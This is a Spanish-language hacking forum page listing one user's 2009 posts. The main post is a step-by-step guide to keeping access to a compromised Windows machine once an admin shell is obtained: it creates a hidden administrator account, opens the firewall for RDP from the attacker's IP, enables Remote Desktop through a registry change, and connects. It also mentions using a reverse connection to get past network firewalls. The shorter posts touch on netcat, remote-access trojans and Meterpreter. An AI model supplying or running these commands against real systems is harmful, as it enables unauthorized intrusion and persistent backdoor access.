Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - kamsky

#371
Hacking / Re: Acceso Remoto (habilitarlo por CMD)
25 Noviembre 2009, 13:03 PM
bueno, vas en el buen camino, vamos a suponer que has conseguido una shell con privilegios de admin, los pasos que más o menos debes seguir para conseguir acceso a escritorio remoto:

Primero , vamos a crearnos un usuario (ANTiSPY:ANTiSPY) y lo vamos a meter en el grupo "Administradores" y "Usuarios de escritorio remoto", para que podamos entrar por RDP y desde ahí tener todos los privilegios que podamos necesitar sobre la máquina

>net user ANTiSPY ANTiSPY /add
>net localgroup Administradores ANTiSPY /add
>net localgroup "Usuarios de escritorio remoto" ANTiSPY /add


Ahora, es posible que tengamos filtrado el puerto de Terminal Server (3389/TCP), para comprobarlo bastará con un simple escaneo con NMap...
Si es así, vamos a tener que desactivar el firewall, o mejor aún, crear una excepción para nuestra IP de origen, así sólo nosotros tendremos acceso al Terminal Server y nadie más podrá aprovechar nuestro trabajo para entrar en la máquina:

>netsh firewall add portopening protocol = TCP port = 3389 name = RDP mode = ENABLE scope = CUSTOM addresses = xx.xx.xx.xx


Si ahora hacemos un nuevo escaneo, veremos que...el puerto ha pasado de filtrado a cerrado, eso quiere decir que el firewall ha sido desactivado correctamente, aunque seguimos sin poder conectar porque no hay un servicio a la escucha. Esto es debido a que hay que modificar una clave de registro (en los Windows XP al menos, supongo que en los Server será parecido, pero no te lo aseguro) para poder activar la administración remota. Hagámoslo:

>reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f


ya solo tenemos que acceder y probar la contraseña que hemos configurado a ver si todo el proceso anterior ha surtido efecto:

# rdesktop xx.xx.xx.xx


Este proceso tiene algunas "pegas", la principal es que puede haber más firewalls en el sistema (firewalls en la red, no en el mismo sistema), la solución sería fácil, hacer una conexión inversa y que sea el Sistema el que se conecte con nosotros...
#372
Hacking / Re: Preguntas netcat
25 Noviembre 2009, 12:43 PM
ya te dije, sólo con tener el Pc encendido ya estás expuesto :P, ahora, dependiendo del grado de exposición al exterior, este riesgo aumenta o disminuye
#373
Hacking / Re: Preguntas netcat
25 Noviembre 2009, 02:57 AM
cualquier puerto es un posible punto de entrada sí, no hay nada 100% seguro, así que si expones tu Pc al exterior, ya lo estás exponiendo a posibles ataques.
obviamente, cuantos más servicios brindes más posibilidades, cuanto más complejo sea el software que brinda esos servicios más posibilidades,y así sucesivamente...

no hay infinidad de puertos posibles, pero si unos cuantos, los suficientes como para no usarlos todos ni de coña!
#374
Hacking / Re: Diccionarios para fuzzing de DNS
24 Noviembre 2009, 15:07 PM
desde consola, un ejemplo:

antonio@hack4free:~$ echo "a b c "
a b c
antonio@hack4free:~$ echo "a b c " | sed "s/ /\\n/g"
a
b
c
#375
muy bueno, la pena es que es sólo para sistemas linux
#376
Nivel Web / Re: Hackea a Elhacker.net !
23 Noviembre 2009, 16:05 PM
si es lo que yo pienso, es en el foro, primera pista dada...  :-X
#377
muy bueno WHK  :rolleyes: ::)
#378
Hacking / Re: Sobre Windows vista
21 Noviembre 2009, 17:39 PM
bifrost,poison ivy no son keyloggers...  :-\

http://www.brothersoft.com/windows-vista-keylogger-133563.html
#379
Hacking / Re: [Mini How-To] Usando Meterpreter
20 Noviembre 2009, 20:13 PM
gracias por el apoyo

bueno, tengo/tenemos otras cosas en mente para hacer, y el metasploit es un mundo, pero si que quizás me planté el ir soltando mini manuales con cosas especificas como esta   :silbar:

salu2
#380
Hacking / Re: Problema con scanner
20 Noviembre 2009, 19:24 PM
Bueno, cuando abres un puerto y lo pones a la escucha, puedes elegir desde que interfaces recibir el tráfico y desde cuales no